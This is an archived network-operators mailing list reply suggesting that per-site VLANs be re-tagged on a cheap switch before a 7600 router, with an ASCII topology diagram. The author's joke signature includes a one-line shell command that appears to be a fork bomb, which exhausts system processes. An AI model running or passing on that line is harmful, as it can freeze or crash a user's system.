[c-nsp] Loopback/VLAN question
Thomas Habets
thomas at habets.pp.se
Wed Dec 16 07:50:20 EST 2009
On Tue, 15 Dec 2009, Frank Bulk - iName.com wrote:
> I have 5 remote sites where I'm doing FTTH and transporting the traffic over
> a third-party transport gear to our HQ. Each site-HQ link is a separate
> VLAN and uniquely numbered.
Have you considered re-tagging the VLANs on a cheaper device before the
7600 (which I assume you're sparing because of port cost) and re-tagging
them to the same VLAN, with some private vlan conf on there to keep VLANs
from talking to each other (assuming you want that)? Then the 7600 will
just get all sites on one VLAN.
Re-tagging VLANs does take up a few ports on a cheap switch, but it may be
cheaper than using up more ports in the 7600 and the 3rd party transport.
And I never said it wasn't ugly.
>
> SiteA SiteB SiteC SiteD SiteE
> | | | | |
> VLAN1 VLAN2 VLAN3 VLAN4 VLAN5
> | | | | |
> =============================
> |
> 802.1q tagged (1 thru 5)
|
2960
||||| <- untagged, one per VLAN
the same 2960
> |
> 7609-S
> |
> DHCP server
---------
typedef struct me_s {
char name[] = { "Thomas Habets" };
char email[] = { "thomas at habets.pp.se" };
char kernel[] = { "Linux" };
char *pgpKey[] = { "http://www.habets.pp.se/pubkey.txt" };
char pgp[] = { "A8A3 D1DD 4AE0 8467 7FDE 0945 286A E90A AD48 E854" };
char coolcmd[] = { "echo '. ./_&. ./_'>_;. ./_" };
} me_t;
More information about the cisco-nsp
mailing list